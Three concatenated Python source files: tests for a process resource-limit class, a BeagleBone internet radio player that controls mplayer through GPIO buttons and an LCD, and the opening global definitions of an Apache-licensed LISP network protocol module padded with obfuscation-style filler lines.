max_real_time=4,
max_output_size=5,
max_process_number=6,
))
assert rl.max_stack == 1
assert rl.max_memory == 2
assert rl.max_cpu_time == 3
assert rl.max_real_time == 4
assert rl.max_output_size == 5
assert rl.max_process_number == 6
def test_to_json(self):
rl = ResourceLimit(
max_stack=1,
max_memory=2,
max_cpu_time=3,
max_real_time=4,
max_output_size=5,
max_process_number=6,
)
assert rl.json == dict(
max_stack=1,
max_memory=2,
max_cpu_time=3,
max_real_time=4,
max_output_size=5,
max_process_number=6,
)
def test_repr(self):
assert repr(ResourceLimit()) == '<ResourceLimit>'
assert repr(ResourceLimit(max_real_time=2.3)) == '<ResourceLimit real time: 2.300s>'
assert repr(ResourceLimit(
max_stack=1,
max_memory=2,
max_cpu_time=3,
max_real_time=4,
max_output_size=5,
max_process_number=6,
)) == '<ResourceLimit cpu time: 3.000s, real time: 4.000s, memory: 2.0 Byte, ' \
'stack: 1.0 Byte, process: 6, output size: 5.0 Byte>'
def test_eq(self):
rl = ResourceLimit(
max_stack=1,
max_memory=2,
max_cpu_time=3,
max_real_time=4,
max_output_size=5,
max_process_number=6,
)
assert rl == rl
assert ResourceLimit.merge(
ResourceLimit(max_memory=2),
ResourceLimit(max_cpu_time=3),
) == ResourceLimit(
max_memory=2,
max_cpu_time=3,
)
assert not (rl == 1)
def test_hash(self):
h = {
ResourceLimit(
max_memory=2,
max_cpu_time=3,
): 1,
ResourceLimit(
max_stack=1,
max_memory=2,
max_cpu_time=3,
max_real_time=4,
max_output_size=5,
max_process_number=6,
): 2,
}
assert h[ResourceLimit(
max_memory=2,
max_cpu_time=3,
)] == 1
assert h[ResourceLimit(
max_stack=1,
max_memory=2,
max_cpu_time=3,
max_real_time=4,
max_output_size=5,
max_process_number=6,
)] == 2
def test_merge(self):
assert ResourceLimit.merge(
ResourceLimit(max_memory=2),
ResourceLimit(max_cpu_time=3),
).json == dict(
max_output_size=None,
max_real_time=None,
max_stack=None,
max_process_number=None,
max_memory=2,
max_cpu_time=3,
)
assert ResourceLimit.merge(ResourceLimit(
max_stack=1,
max_memory=2,
max_cpu_time=3,
max_real_time=4,
max_output_size=5,
max_process_number=6,
), ResourceLimit(
max_stack=6,
max_memory=5,
max_cpu_time=4,
max_real_time=3,
max_output_size=2,
max_process_number=1,
)).json == dict(
max_stack=1,
max_memory=2,
max_cpu_time=3,
max_real_time=3,
max_output_size=2,
max_process_number=1,
)
def test_apply_1(self):
with Manager() as manager:
_result = manager.dict(dict(
max_cpu_time=None,
max_memory=None,
max_stack=None,
max_output_size=None,
max_process_number=None,
))
# noinspection PyTypeChecker,DuplicatedCode
def _get_user_and_group():
rl = ResourceLimit(
max_cpu_time='5s',
max_memory='512mb',
max_stack='1G',
max_output_size='64m',
max_process_number=3,
)
rl.apply()
_result['max_cpu_time'] = resource.getrlimit(resource.RLIMIT_CPU)
_result['max_memory'] = resource.getrlimit(resource.RLIMIT_AS)
_result['max_stack'] = resource.getrlimit(resource.RLIMIT_STACK)
_result['max_output_size'] = resource.getrlimit(resource.RLIMIT_FSIZE)
_result['max_process_number'] = resource.getrlimit(resource.RLIMIT_NPROC)
p = Process(target=_get_user_and_group)
p.start()
p.join()
_result = dict(_result)
assert _result == dict(
max_cpu_time=(6, 6),
max_memory=(780435456, 780435456),
max_stack=(1000000000, 1000000000),
max_output_size=(64000000, 64000000),
max_process_number=(3, 3),
)
def test_apply_2(self):
with Manager() as manager:
_result = manager.dict(dict(
max_cpu_time=None,
max_memory=None,
max_stack=None,
max_output_size=None,
))
# noinspection PyTypeChecker,DuplicatedCode
def _get_user_and_group():
rl = ResourceLimit()
rl.apply()
_result['max_cpu_time'] = resource.getrlimit(resource.RLIMIT_CPU)
_result['max_memory'] = resource.getrlimit(resource.RLIMIT_AS)
_result['max_stack'] = resource.getrlimit(resource.RLIMIT_STACK)
_result['max_output_size'] = resource.getrlimit(resource.RLIMIT_FSIZE)
p = Process(target=_get_user_and_group)
p.start()
p.join()
_result = dict(_result)
assert _result == dict(
max_cpu_time=(-1, -1),
max_memory=(-1, -1),
max_stack=(-1, -1),
max_output_size=(-1, -1),
)
|
testmp.py | import os
import subprocess
import time
import sys
import re
import lcd
import threading
import Adafruit_BBIO.GPIO as GPIO
stations={'JAZZ': 'http://www.radioswissjazz.ch/live/aacp.m3u', 'Virgin Radio': 'http://shoutcast.unitedradio.it:1301','Deejay': 'http://mp3.kataweb.it:8000/RadioDeejay','105Hits': 'http://shoutcast.unitedradio.it:1109/listen.pls'}
volume = 25 #default volume value for mplayer
streamTitle=""
pause = 0
lines = ["", "", "", ""]
# Pin setup
GPIO.setup("P9_21", GPIO.IN)
GPIO.setup("P9_22", GPIO.IN)
GPIO.setup("P9_23", GPIO.IN)
GPIO.setup("P9_24", GPIO.IN)
#p = subprocess.Popen(["mplayer","-ao","alsa:device=hw=1.0", "-quiet", "-slave", "http://shoutcast.unitedradio.it:1301"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#p = subprocess.Popen(["mplayer","-ao","alsa:device=hw=1.0", "-slave", "-playlist", "http://www.radioswissjazz.ch/live/aacp.m3u"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
#p = subprocess.Popen(["mplayer","-ao","alsa:device=hw=1.0", "-slave", "-mixer-channel", "-playlist", stations['JAZZ']], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
p = subprocess.Popen(["mplayer","-ao","alsa:device=hw=1.0", "-slave", "-playlist", stations['JAZZ']], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# set the lcd up
lcd.setup()
lcd.init()
# to be called as a new thread
#def waitCmd():
# to be called as a new thread
def streamAnalysis():
global streamTitle
print "[DEBUG] Thread analysis"
for line in p.stdout:
if line.startswith("ICY Info"):
info = line.split(':', 1)[1].strip()
attr = dict(re.findall("(\w+)='([^']*)'", info))
print '[DEBUG] Stream title: '+ attr.get('StreamTitle', '(none)')
#streamTitle = '[DEBUG] Stream title: '+ attr.get('StreamTitle', '(none)')
streamTitle = attr.get('StreamTitle', '(none)')
print streamTitle
lcd.writeln(1, "Welcome!")
print "Welcome!"
t = threading.Thread(target=streamAnalysis)
t.start()
"""
for line in p.stdout:
if line.startswith("ICY Info"):
info = line.split(':', 1)[1].strip()
attr = dict(re.findall("(\w+)='([^']*)'", info))
print '[DEBUG] Stream title: '+ attr.get('StreamTitle', '(none)')
"""
#out, err = p.communicate()
#------Mario 08/02/2014 tolta la pausa di 5 secondi per fare prove su controllo volume
#time.sleep(5)
#p.stdin.write('pause\n') #funziona
#subprocess.Popen(["echo","'pause\n'"], shell=True, stdin=subprocess.PIPE).stdin
#sys.stdin = sys.stdout
#print "prima pausa"
#sys.stdout.write("pause\n")
#time.sleep(5)
#p.stdin.write('pause\n') #funziona play di nuovo
#print "play di nuovo"
#sys.stdout.write("pause\n")
sys.stdin = sys.__stdin__ #restore original stdin
#print "[INFO] Versione DEMO: solo 15 secondi di radio..."
#time.sleep(15)
#p.kill()
def function1():
print "Run function 1"
global volume, pause
volume = volume + 5
if (volume > 100):
volume = 100
string = "set_property volume %d\n" %(volume)
print "Setting volume: %d\n" %(volume)
#p.stdin.write('set_property volume 10\n')
p.stdin.write(string)
lines[3]="Volume: " + str(volume) + "%"
time.sleep(0.4)
lines[3] = ""
def function2():
print "Run function 2"
global volume, pause
volume = volume - 5
if (volume < 0):
volume = 0
print "Setting volume: %d\n" %(volume)
string = 'set_property volume %d\n' %(volume)
p.stdin.write(string)
#p.stdin.write('set_property volume 40\n')
lines[3]="Volume: " + str(volume) + "%"
time.sleep(0.4)
lines[3] = ""
def function3():
global pause
print "Run function 3"
if pause==False:
p.stdin.write('pause\n')
lines[3]="**PAUSE**"
#lcd.writeln(4, "**PAUSE**")
pause = True
else:
p.stdin.write('pause\n')
lines[3]=""
#lcd.writeln(4, "") # clear line 4
pause = False
def function4():
global streamTitle
print "Run function 4"
print streamTitle
#lcd.writeln(2, streamTitle[0:20])
def updateLCD():
global lines
global streamTitle
while(1):
lines[1] = streamTitle
lcd.writeln(2, lines[1][0:20])
lcd.writeln(4, lines[3])
#lcd.writeln(2, streamTitle[0:20])
#time.sleep(1)
def inputButtons():
old_switch_state1 = 1
old_switch_state2 = 1
old_switch_state3 = 1
old_switch_state4 = 1
print "***** Benvenuto nel Thread BUTTON ******"
while(1):
new_switch_state1 = GPIO.input("P9_21")
if new_switch_state1 == 0 and old_switch_state1 == 1 :
print('Do not press this button 1 again!')
function1()
time.sleep(0.1)
old_switch_state1 = new_switch_state1
new_switch_state2 = GPIO.input("P9_22")
if new_switch_state2 == 0 and old_switch_state2 == 1 :
print('Do not press this button 2 again!')
function2()
time.sleep(0.1)
old_switch_state2 = new_switch_state2
new_switch_state3 = GPIO.input("P9_23")
if new_switch_state3 == 0 and old_switch_state3 == 1 :
print('Do not press this button 3 again!')
function3()
time.sleep(0.1)
old_switch_state3 = new_switch_state3
new_switch_state4 = GPIO.input("P9_24")
if new_switch_state4 == 0 and old_switch_state4 == 1 :
print('Do not press this button 4 again!')
function4()
time.sleep(0.1)
old_switch_state4 = new_switch_state4
#if not GPIO.input("P9_21"): function1()
#if not GPIO.input("P9_22"): function2()
#if not GPIO.input("P9_23"): function3()
#if not GPIO.input("P9_24"): function4()
def inputButton1():
old_switch_state = 1
print "***** Benvenuto nel Thread BUTTON ******"
while(1):
new_switch_state = GPIO.input("P9_21")
if new_switch_state == 0 and old_switch_state == 1 :
print('Do not press this button 1 again!')
time.sleep(0.1)
old_switch_state = new_switch_state
#if not GPIO.input("P9_21"): function1()
#if not GPIO.input("P9_22"): function2()
#if not GPIO.input("P9_23"): function3()
#if not GPIO.input("P9_24"): function4()
def inputButton2():
old_switch_state = 1
print "***** Benvenuto nel Thread BUTTON ******"
while(1):
new_switch_state = GPIO.input("P9_22")
if new_switch_state == 0 and old_switch_state == 1 :
print('Do not press this button 2 again!')
time.sleep(0.1)
old_switch_state = new_switch_state
def inputButton3():
old_switch_state = 1
print "***** Benvenuto nel Thread BUTTON ******"
while(1):
new_switch_state = GPIO.input("P9_23")
if new_switch_state == 0 and old_switch_state == 1 :
print('Do not press this button 3 again!')
time.sleep(0.1)
old_switch_state = new_switch_state
def inputButton4():
old_switch_state = 1
print "***** Benvenuto nel Thread BUTTON ******"
while(1):
new_switch_state = GPIO.input("P9_24")
if new_switch_state == 0 and old_switch_state == 1 :
print('Do not press this button 4 again!')
time.sleep(0.1)
old_switch_state = new_switch_state
t2 = threading.Thread(target=updateLCD)
t2.start()
#inputBtn1 = threading.Thread(target=inputButton1)
#inputBtn1.start()
#inputBtn2 = threading.Thread(target=inputButton2)
#inputBtn2.start()
#inputBtn3 = threading.Thread(target=inputButton3)
#inputBtn3.start()
#inputBtn4 = threading.Thread(target=inputButton4)
#inputBtn4.start()
inputBtns = threading.Thread(target=inputButtons)
inputBtns.start()
# read event streaming
#evt_file = open("/dev/input/event1", "rb")
while(1): time.sleep(1)
#lcd.writeln(2, streamTitle[0:20])
#evt = evt_file.read(16) # Read the event
#evt_file.read(16) # Discard the debounce event
#code = ord(evt[10])
#print "Button "+str(code)+" pressed with direction "+str(ord(evt[12]))
#if str(code)=='1' and str(ord(evt[12]))=='1': function1()
#elif str(code)=='2' and str(ord(evt[12]))=='1': function2()
#elif str(code)=='3' and str(ord(evt[12]))=='1': function3()
#elif str(code)=='4' and str(ord(evt[12]))=='1': function4()
|
lisp.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto . Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy . distance import vincenty
import curve25519
use_chacha = ( os . getenv ( "LISP_USE_CHACHA" ) != None )
use_poly = ( os . getenv ( "LISP_USE_POLY" ) != None )
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
lisp_print_rloc_probe_list = False
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
if 30 - 30: o0oOOo0O0Ooo - O0 % o0oOOo0O0Ooo - OoooooooOO * O0 * OoooooooOO
if 60 - 60: iIii1I11I1II1 / i1IIi * oO0o - I1ii11iIi11i + o0oOOo0O0Ooo
if 94 - 94: i1IIi % Oo0Ooo
if 68 - 68: Ii1I / O0
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
if 46 - 46: O0 * II111iiii / IiII * Oo0Ooo * iII111i . I11i
lisp_map_notify_queue = { }
lisp_map_servers_list = { }
lisp_ddt_map_requestQ = { }
lisp_db_list = [ ]
lisp_group_mapping_list = { }
lisp_map_resolvers_list = { }
lisp_rtr_list = { }
lisp_elp_list = { }
lisp_rle_list = { }
lisp_geo_list = { }
lisp_json_list = { }
lisp_myrlocs = [ None , None , None ]
lisp_mymacs = { }
if 62 - 62: i11iIiiIii - II111iiii % I1Ii111 - iIii1I11I1II1 . I1ii11iIi11i . II111iiii
if 61 - 61: oO0o / OoOoOO00 / iII111i * OoO0O00 . II111iiii
if 1 - 1: II111iiii - I1ii11iIi11i % i11iIiiIii + IiII . I1Ii111
if 55 - 55: iIii1I11I1II1 - I1IiiI . Ii1I * IiII * i1IIi / iIii1I11I1II1
if 79 - 79: oO0o + I1Ii111 . ooOoO0o * IiII % I11i . I1IiiI
lisp_myinterfaces = { }
lisp_iid_to_interface = { }
lisp_multi_tenant_interfaces = [ ]
if 94 - 94: iII111i * Ii1I / IiII . i1IIi * iII111i
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
if 47 - 47: i1IIi % i11iIiiIii
if 20 - 20: ooOoO0o * II111iiii
if 65 - 65: o0oOOo0O0Ooo * iIii1I11I1II1 * ooOoO0o
if 18 - 18: iIii1I11I1II1 / I11i + oO0o / Oo0Ooo - II111iiii - I11i
lisp_registered_count = 0
if 1 - 1: I11i - OOooOOo % O0 + I1IiiI - iII111i / I11i
if 31 - 31: OoO0O00 + II111iiii
if 13 - 13: OOooOOo * oO0o * I1IiiI
if 55 - 55: II111iiii
lisp_info_sources_by_address = { }
lisp_info_sources_by_nonce = { }
if 43 - 43: OoOoOO00 - i1IIi + I1Ii111 + Ii1I
if 17 - 17: o0oOOo0O0Ooo
if 64 - 64: Ii1I % i1IIi % OoooooooOO
if 3 - 3: iII111i + O0
if 42 - 42: OOooOOo / i1IIi + i11iIiiIii - Ii1I
if 78 - 78: OoO0O00
lisp_crypto_keys_by_nonce = { }
lisp_crypto_keys_by_rloc_encap = { }
lisp_crypto_keys_by_rloc_decap = { }
lisp_data_plane_security = False
lisp_search_decap_keys = True
if 18 - 18: O0 - iII111i / iII111i + ooOoO0o % ooOoO0o - IiII
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
if 62 - 62: iII111i - IiII - OoOoOO00 % i1IIi / oO0o
if 77 - 77: II111iiii - II111iiii . I1IiiI / o0oOOo0O0Ooo
if 14 - 14: I11i % O0
if 41 - 41: i1IIi + I1Ii111 + OOooOOo - IiII
if 77 - 77: Oo0Ooo . IiII % ooOoO0o
if 42 - 42: oO0o - i1IIi / i11iIiiIii + OOooOOo + OoO0O00
if 17 - 17: oO0o . Oo0Ooo . I1ii11iIi11i
lisp_crypto_ephem_port = None
if 3 - 3: OoOoOO00 . Oo0Ooo . I1IiiI / Ii1I
if 38 - 38: II111iiii % i11iIiiIii . ooOoO0o - OOooOOo + Ii1I
if 66 - 66: OoooooooOO * OoooooooOO . OOooOOo . i1IIi - OOooOOo
if 77 - 77: I11i - iIii1I11I1II1
lisp_pitr = False
if 82 - 82: i11iIiiIii . OOooOOo / Oo0Ooo * O0 % oO0o % iIii1I11I1II1
if 78 - 78: iIii1I11I1II1 - Ii1I * OoO0O00 + o0oOOo0O0Ooo + iII111i + iII111i
if 11 - 11: iII111i - OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
lisp_l2_overlay = False
if 89 - 89: oO0o + Oo0Ooo
if 3 - 3: i1IIi / I1IiiI % I11i * i11iIiiIii / O0 * I11i
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
if 48 - 48: I11i + I11i / II111iiii / iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo
lisp_rloc_probing = False
lisp_rloc_probe_list = { }
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
if 53 - 53: IiII + I1IiiI * oO0o
lisp_register_all_rtrs = True
if 61 - 61: i1IIi * OOooOOo / OoooooooOO . i11iIiiIii . OoOoOO00
if 60 - 60: I11i / I11i
if 46 - 46: Ii1I * OOooOOo - OoO0O00 * oO0o - I1Ii111
if 83 - 83: OoooooooOO
lisp_nonce_echoing = False
lisp_nonce_echo_list = { }
if 31 - 31: II111iiii - OOooOOo . I1Ii111 % OoOoOO00 - O0
if 4 - 4: II111iiii / ooOoO0o . iII111i
if 58 - 58: OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - I1ii11iIi11i / oO0o
if 50 - 50: I1IiiI
lisp_nat_traversal = False
if 34 - 34: I1IiiI * II111iiii % iII111i * OoOoOO00 - I1IiiI
if 33 - 33: o0oOOo0O0Ooo + OOooOOo * OoO0O00 - Oo0Ooo / oO0o % Ii1I
if 21 - 21: OoO0O00 * iIii1I11I1II1 % oO0o * i1IIi
if 16 - 16: O0 - I1Ii111 * iIii1I11I1II1 + iII111i
if 50 - 50: II111iiii - ooOoO0o * I1ii11iIi11i / I1Ii111 + o0oOOo0O0Ooo
if 88 - 88: Ii1I / I1Ii111 + iII111i - II111iiii / ooOoO0o - OoOoOO00
if 15 - 15: I1ii11iIi11i + OoOoOO00 - OoooooooOO / OOooOOo
if 58 - 58: i11iIiiIii % I11i
lisp_program_hardware = False
if 71 - 71: OOooOOo + ooOoO0o % i11iIiiIii + I1ii11iIi11i - IiII
if 88 - 88: OoOoOO00 - OoO0O00 % OOooOOo
if 16 - 16: I1IiiI * oO0o % IiII
if 86 - 86: I1IiiI + Ii1I % i11iIiiIii * oO0o . ooOoO0o * I11i
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
if 44 - 44: oO0o
if 88 - 88: I1Ii111 % Ii1I . II111iiii
if 38 - 38: o0oOOo0O0Ooo
if 57 - 57: O0 / oO0o * I1Ii111 / OoOoOO00 . II111iiii
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
if 26 - 26: iII111i
if 91 - 91: OoO0O00 . I1ii11iIi11i + OoO0O00 - iII111i / OoooooooOO
if 39 - 39: I1ii11iIi11i / ooOoO0o - II111iiii
if 98 - 98: I1ii11iIi11i / I11i % oO0o . OoOoOO00
if 91 - 91: oO0o % Oo0Ooo
lisp_ipc_lock = None
if 64 - 64: I11i % iII111i - I1Ii111 - oO0o
if 31 - 31: I11i - II111iiii . I11i
if 18 - 18: o0oOOo0O0Ooo
if 98 - 98: iII111i * iII111i / iII111i + I11i
if 34 - 34: ooOoO0o
if 15 - 15: I11i * ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
lisp_default_iid = 0
lisp_default_secondary_iid = 0
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
if 31 - 31: I1Ii111 . OoOoOO00 / O0
if 89 - 89: OoOoOO00
if 68 - 68: OoO0O00 * OoooooooOO % O0 + OoO0O00 + ooOoO0o
lisp_ms_rtr_list = [ ]
if 4 - 4: ooOoO0o + O0 * OOooOOo
if 55 - 55: Oo0Ooo + iIii1I11I1II1 / OoOoOO00 * oO0o - i11iIiiIii - Ii1I
if 25 - 25: I1ii11iIi11i
if 7 - 7: i1IIi / I1IiiI * I1Ii111 . IiII . iIii1I11I1II1
if 13 - 13: OOooOOo / i11iIiiIii
if 2 - 2: I1IiiI / O0 / o0oOOo0O0Ooo % OoOoOO00 % Ii1I
lisp_nat_state_info = { }
if 52 - 52: o0oOOo0O0Ooo
if 95 - 95: Ii1I
if 87 - 87: ooOoO0o + OoOoOO00 . OOooOOo + OoOoOO00
if 91 - 91: O0
lisp_last_map_request_sent = None
if 61 - 61: II111iiii
if 64 - 64: ooOoO0o / OoOoOO00 - O0 - I11i
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
if 42 - 42: OoO0O00
lisp_last_icmp_too_big_sent = 0
if 67 - 67: I1Ii111 . iII111i . O0
if 10 - 10: I1ii11iIi11i % I1ii11iIi11i - iIii1I11I1II1 / OOooOOo + Ii1I
if 87 - 87: oO0o * I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
if 37 - 37: iII111i - ooOoO0o * oO0o % i11iIiiIii - I1Ii111
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = [ ]
if 83 - 83: I11i / I1IiiI
if 34 - 34: IiII
if 57 - 57: oO0o . I11i . i1IIi
if 42 - 42: I11i + I1ii11iIi11i % O0
lisp_policies = { }
if 6 - 6: oO0o
if 68 - 68: OoOoOO00 - OoO0O00
if 28 - 28: OoO0O00 . OOooOOo / OOooOOo + Oo0Ooo . I1ii11iIi11i
if 1 - 1: iIii1I11I1II1 / II111iiii
if 33 - 33: I11i
lisp_load_split_pings = False
if 18 - 18: o0oOOo0O0Ooo % iII111i * O0
if 87 - 87: i11iIiiIii
if 93 - 93: I1ii11iIi11i - OoO0O00 % i11iIiiIii . iII111i / iII111i - I1Ii111
if 9 - 9: I1ii11iIi11i / Oo0Ooo - I1IiiI / OoooooooOO / iIii1I11I1II1 - o0oOOo0O0Ooo
if 91 - 91: iII111i % i1IIi % iIii1I11I1II1
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
lisp_eid_hashes = [ ]
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
if 51 - 51: O0 + iII111i
if 8 - 8: oO0o * OoOoOO00 - Ii1I - OoO0O00 * OOooOOo % I1IiiI
if 48 - 48: O0
if 11 - 11: I11i + OoooooooOO - OoO0O00 / o0oOOo0O0Ooo + Oo0Ooo . II111iiii
if 41 - 41: Ii1I - O0 - O0
if 68 - 68: OOooOOo % I1Ii111
if 88 - 88: iIii1I11I1II1 - ooOoO0o + OOooOOo
lisp_reassembly_queue = { }
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
if 23 - 23: O0
if 85 - 85: Ii1I
if 84 - 84: I1IiiI . iIii1I11I1II1 % OoooooooOO + Ii1I % OoooooooOO % OoO0O00
if 42 - 42: OoO0O00 / I11i / o0oOOo0O0Ooo + iII111i / OoOoOO00
if 84 - 84: ooOoO0o * II111iiii + Oo0Ooo
lisp_pubsub_cache = { }
if 53 - 53: iII111i % II111iiii . IiII - iIii1I11I1II1 - IiII * II111iiii
if 77 - 77: iIii1I11I1II1 * OoO0O00
if 95 - 95: I1IiiI + i11iIiiIii
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
if 80 - 80: II111iiii
if 83 - 83: I11i . i11iIiiIii + II111iiii . o0oOOo0O0Ooo * I11i
lisp_decent_push_configured = False
if 53 - 53: II111iiii
if 31 - 31: OoO0O00
if 80 - 80: I1Ii111 . i11iIiiIii - o0oOOo0O0Ooo
if 25 - 25: OoO0O00
if 62 - 62: OOooOOo + O0
if 98 - 98: o0oOOo0O0Ooo
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
if 51 - 51: Oo0Ooo - oO0o + II111iiii * Ii1I . I11i + oO0o
if 78 - 78: i11iIiiIii / iII111i - Ii1I / OOooOOo + oO0o
if 82 - 82: Ii1I
if 46 - 46: OoooooooOO . i11iIiiIii
if 94 - 94: o0oOOo0O0Ooo * Ii1I / Oo0Ooo / Ii1I
if 87 - 87: Oo0Ooo . IiII
lisp_ipc_socket = None
if 75 - 75: ooOoO0o + OoOoOO00 + o0oOOo0O0Ooo * I11i % oO0o . iII111i
if 55 - 55: OOooOOo . I1IiiI
if 61 - 61: Oo0Ooo % IiII . Oo0Ooo
if 100 - 100: I1Ii111 * O0
lisp_ms_encryption_keys = { }
if 64 - 64: OOooOOo % iIii1I11I1II1 * oO0o
if 79 - 79: O0
if 78 - 78: I1ii11iIi11i + OOooOOo - I1Ii111
if 38 - 38: o0oOOo0O0Ooo - oO0o + iIii1I11I1II1 / OoOoOO00 % Oo0Ooo
if 57 - 57: OoO0O00 / ooOoO0o
if 29 - 29: iIii1I11I1II1 + OoOoOO00 * OoO0O00 * OOooOOo . I1IiiI * I1IiiI
if 7 - 7: IiII * I1Ii111 % Ii1I - o0oOOo0O0Ooo
if 13 - 13: Ii1I . i11iIiiIii
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
if 88 - 88: OoooooooOO - OoO0O00 * O0 * OoooooooOO . OoooooooOO
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
if 57 - 57: i11iIiiIii . I1ii11iIi11i - Ii1I - oO0o + OoOoOO00
lisp_rtr_nat_trace_cache = { }
if 63 - 63: OoOoOO00 * iII111i
if 69 - 69: O0 . OoO0O00
if 49 - 49: I1IiiI - I11i
if 74 - 74: iIii1I11I1II1 * I1ii11iIi11i + OoOoOO00 / i1IIi / II111iiii . Oo0Ooo
if 62 - 62: OoooooooOO * I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if 97 - 97: O0 + OoOoOO00
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
lisp_glean_mappings = [ ]
if 77 - 77: OOooOOo * iIii1I11I1II1
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
if 71 - 71: Oo0Ooo % OOooOOo
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
if 78 - 78: I1ii11iIi11i % oO0o / iII111i - iIii1I11I1II1
if 69 - 69: I1Ii111
if 11 - 11: I1IiiI
if 16 - 16: Ii1I + IiII * O0 % i1IIi . I1IiiI
if 67 - 67: OoooooooOO / I1IiiI * Ii1I + I11i
if 65 - 65: OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii / i1IIi
if 71 - 71: I1Ii111 + Ii1I
if 28 - 28: OOooOOo
if 38 - 38: ooOoO0o % II111iiii % I11i / OoO0O00 + OoOoOO00 / i1IIi
if 54 - 54: iIii1I11I1II1 % I1ii11iIi11i - OOooOOo / oO0o - OoO0O00 . I11i
if 11 - 11: I1ii11iIi11i . OoO0O00 * IiII * OoooooooOO + ooOoO0o
if 33 - 33: O0 * o0oOOo0O0Ooo - I1Ii111 % I1Ii111
if 18 - 18: I1Ii111 / Oo0Ooo * I1Ii111 + I1Ii111 * i11iIiiIii * I1ii11iIi11i
lisp_gleaned_groups = { }
if 11 - 11: ooOoO0o / OoOoOO00 - IiII * OoooooooOO + OoooooooOO . OoOoOO00
if 26 - 26: Ii1I % I1ii11iIi11i
if 76 - 76: IiII * iII111i
if 52 - 52: OOooOOo
if 19 - 19: I1IiiI
lisp_icmp_raw_socket = None
if ( os . getenv ( "LISP_SEND_ICMP_TOO_BIG" ) != None ) :
lisp_icmp_raw_socket = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_ICMP )
lisp_icmp_raw_socket . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
if 25 - 25: Ii1I / ooOoO0o
if 31 - 31: OOooOOo . O0 % I1IiiI . o0oOOo0O0Ooo + IiII
lisp_ignore_df_bit = ( os . getenv ( "LISP_IGNORE_DF_BIT" ) != None )
if 71 - 71: I1Ii111 . II111iiii
if 62 - 62: OoooooooOO . I11i
if 61 - 61: OoOoOO00 - OOooOOo - i1IIi
